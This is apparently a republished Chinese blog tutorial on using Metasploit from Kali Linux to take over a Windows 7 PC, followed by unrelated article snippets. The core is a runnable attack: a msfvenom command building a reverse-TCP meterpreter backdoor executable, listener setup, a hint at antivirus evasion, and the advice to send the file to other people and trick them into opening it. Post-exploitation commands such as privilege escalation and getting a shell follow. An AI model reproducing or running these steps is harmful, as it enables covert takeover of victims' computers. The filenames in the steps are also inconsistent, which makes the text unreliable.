kail linux 系统下利用metaspolit工具渗透win7电脑

 注:只是测试,不可干违法的事。

一、metaspolit工具的介绍

  • 1.1、metaspolit 是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。
  • 1.2、Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具,因此安全工作人员常用Metasploit工具来检测系统的安全性。
  • 1.3、Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠         平台
  • 1.4、这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode          并且不断更新。

二、专业术语

  • 渗透测试(Exploit):指由攻击者或渗透测试者利用一个系统、应用或服务中的安全漏洞,所进行的攻击行为。能够进行攻击并得到目标系统控制权的恶意代码。经典的exploit由payload和injector(注入程序)组成,payload负责取得系统的控制权,而注入程序负责将payload注射到相应的有漏洞的系统中;
  • 攻击载荷(Payload):是我们期望目标系统在被渗透攻击之后执行的代码。其实就是广义上的Shellcode,被翻译为‘有效载荷’
  • shellcode ::攻击程序的核心代码,能够取得系统的攻击权,一把是取得一个shell。是在渗透攻击时作为攻击载荷运行的一组机器指令,通常用汇编语言编写。injector:相对shellcode来说,它实现加载和发送shellcode,提供返回地址等功能;
  • 模块(Module):指Metaspolit框架中所使用的一段软件代码组件,可用于发起渗透攻击或者行某些辅助攻击。
    • auxiliary
    • encoders
    • exploits
    • nops
    • payloads
    • post 
  • 监听器(Listener):是metaspolit中用来等待网络连接的组件。

二、metaspolit工具的简单使用

三、小实验:利用metaspolit工具渗透win7电脑

流程如下:

1、使用工具:kail Linux 系统(IP:192.168.31.54)

       win7 系统(IP:192.168.31.136)

2、步骤:  

1、首先在kali上制作一个后门程序。文件名为:openme.exe
       命令:
            msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.54 LPORT=5050 -f exe -o setup.exe
            #本地监听地址及端口号:192.168.31.54:5050
    2、为生成的文件 openme.exe 赋予可执行的权限,如果有必要可以对该文件执行免杀
       命令:
            chmod 777 openme.exe
    3、打开msf,加载exploit/multi/handler模块,同时设置本地主机地址,本地端口
       命令:msfconsole
            msf > use exploit/multi/handler
            msf exploit(handler) > set lhost 192.168.31.54
            msf exploit(handler) > set lport 5050
    4、开始执行渗透攻击并监听
       命令:
            msf exploit(handler) > exploit -z -j
    5、此时,你可以将文件发给其他人,利用社会工程学知识让别人在他的win7系统上打开该文件,那么你的目的就达到了
    6、后门程序反向连接到msf,msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。
       如图你在你kali上会有一个session。你攻陷了别人的主机并拿到了shell,还有session信息。
       命令:
            msf exploit(handler) > sessions
            msf exploit(handler) > sessions -i 1
            meterpreter > shell
    7、入侵成功之后可操作win7电脑
        getsystem        #会自动利用各种各样的系统漏洞来进行权限提升
        migrate          #进程id进程迁移
        background       #把当前的会话设置为背景,需要的时候在启用
        getuid          #查看对方正在运行的用户
        ps   #列出所有的进程
        getpid      #返回运行meterpreter的id号
        sysinfo       #产看系统信息和体系结构
        shell    #切换到cmd的系统权限方式

3、运行结果截图

查看本地的IP

 

用msfvenom生成exe文件

启动metaspolit

设置本地IP地址和端口并且攻击

当对方打开exe文件的时候,会生成一个session会话,如下图所示

现在就可以操作别人电脑了,如下图:

原文地址:https://www.cnblogs.com/haiyan123/p/8981844.html

时间: 2024-10-08 08:06:38

kail linux 系统下利用metaspolit工具渗透win7电脑的相关文章

Linux系统下利用文件创建文件系统

在Linux系统下利用文件创建文件系统,小伙伴们乍一听也许会有点不知道其意义何在. 其实不然,利用文件创建文件系统还是相当有实用价值的 首先我们在做一些测试时,不想使用实际的磁盘分区时,我们可以利用文件创建文件系统,然后在其上做一些测试: 其次,我们将数据写在利用文件创建的文件系统上,必要时,我们可以将文件拷走,实现数据的便捷迁移,而在磁盘分区上的数据我们想拷走就比较麻烦了. 废话不多说,下面就来做个小实验,来演示下其步奏: 首先我们在/testdir测试目录下创建一个partfile文件 利用

Linux系统下利用wget命令把整站下载做镜像网站

Linux系统下利用wget命令把整站下载做镜像网站 2011-05-28 18:13:01 | 1次阅读 | 评论:0 条 | itokit  在linux下完整的用wget命令整站采集网站做镜像 的命令是及无视网站根目录下的robots.txt限制.并且可以模拟一个正常浏览者的信息下载该网站. C/C++ Code复制内容到剪贴板 wget -m -e robots=off -U "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.

Linux系统下C++开发工具-远程终端软件使用

通过前面安装Linux系统介绍,紧接着进入搭建Linux开发环境的第二步,选择C++开发工具,以及必要的客户端软件.从而完整的搭建一个Linux下C++开发的环境,便于初学者在该环境下能够很好的学习. 一.代码编辑器 由于采用Windows下开发Linux的C++程序,那么选择一个在Windows中方便代码编辑的工具也是非常的重要.C++代码编辑器种类很多,就连记事本也可以用作C++代码编辑.这里推荐使用UE(UltraEdit)这款功能强大的代码编辑工具. UltraEdit工具是共享软件,可

Linux系统下rz/sz工具的安装

(1)编译安装 root 账号登陆后,依次执行以下命令: wget http://www.ohse.de/uwe/releases/lrzsz-0.12.20.tar.gz tar zxvf lrzsz-0.12.20.tar.gz && cd lrzsz-0.12.20 ./configure && make && make install 上面安装过程默认把lsz和lrz安装到了/usr/local/bin/目录下,现在我们并不能直接使用,下面创建软链接

Linux系统下的定时任务Crontab

什么是Crontab Crontab是Linux系统下的定时任务工具,相当于WIN7系统的任务计划,能够让系统定时做出详见 Cron Crontab能用来做什么 Crontab能用来添加Linux或者Unix系统中的定时任务,让系统定时执行某个命令,比如服务器的数据库需要每天凌晨重启下,不可能每天凌晨起来手动重启.可以用Crontab添加凌晨5点重启数据库的定时任务,系统到每天凌晨5点就会自动重启数据了. Crontab能做的事情还很多,比如定时发送邮件,定时检验库存,定时清理日志,定时备份数据

在Linux系统下运行微信Web开发者工具

微信Web开发者工具只有window版本和mac版本,如果想要在Linux系统下运行微信Web开发者工具,需要花费很大周折. 注:带 * 的步骤或文件为不确定是否管用的步骤或文件.本人系统为Linux Mint 18.1版本. 1.下载nwjs 下载nwjs的SDK. 2.将微信web开发者工具拷贝到nwjs 将在window系统下安装的微信web开发者工具文件夹中的package.nw.icon.ico.* 微信web开发者工具.exe拷贝到nwjs sdk解压后的文件夹内. * 解压 微信w

Linux系统下自动安装邮件工具Mutt和Msmtp

linux系统下不需启动sendmail类似工具. #!/bin/sh # Create by  JIANGLEI.YU #Define  Configure file check_result(){     if [ $1 != 0 ];then         echo -e "\e[1,44m  <==== Error,Exit install Mutt ====> \e[0m"         rm -fr  /usr/local/msmtp/etc        

使用 ipmitool 实现 Linux 系统下对服务器的 ipmi 管理

http://www.ibm.com/developerworks/cn/linux/l-ipmi/ 1.简介 IPMI(Intelligent Platform Management Interface)即智能平台管理接口是使硬件管理具备“智能化”的新一代通用接口标准.用户可以利用 IPMI 监视服务器的物理特征,如温度.电压.电扇工作状态.电源供应以及机箱入侵等.Ipmi 最大的优势在于它是独立于 CPU BIOS 和 OS 的,所以用户无论在开机还是关机的状态下,只要接通电源就可以实现对服

Linux 系统监控、诊断工具-top,vmstat,iostat,iotop

1.问题: 最近在做日志的实时同步,上线之前是做过单份线上日志压力测试的,消息队列和客户端.本机都没问题,但是没想到上了第二份日志之后,问题来了: 集群中的某台机器 top 看到负载巨高,集群中的机器硬件配置一样,部署的软件都一样,却单单这一台负载有问题,初步猜测可能硬件有问题了. 同时,我们还需要把负载有异常的罪魁祸首揪出来,到时候从软件.硬件层面分别寻找解决方案. 2.排查: 从 top 中可以看到 load average 偏高,%wa 很高,%us 偏低: 从上图我们大致可以推断 IO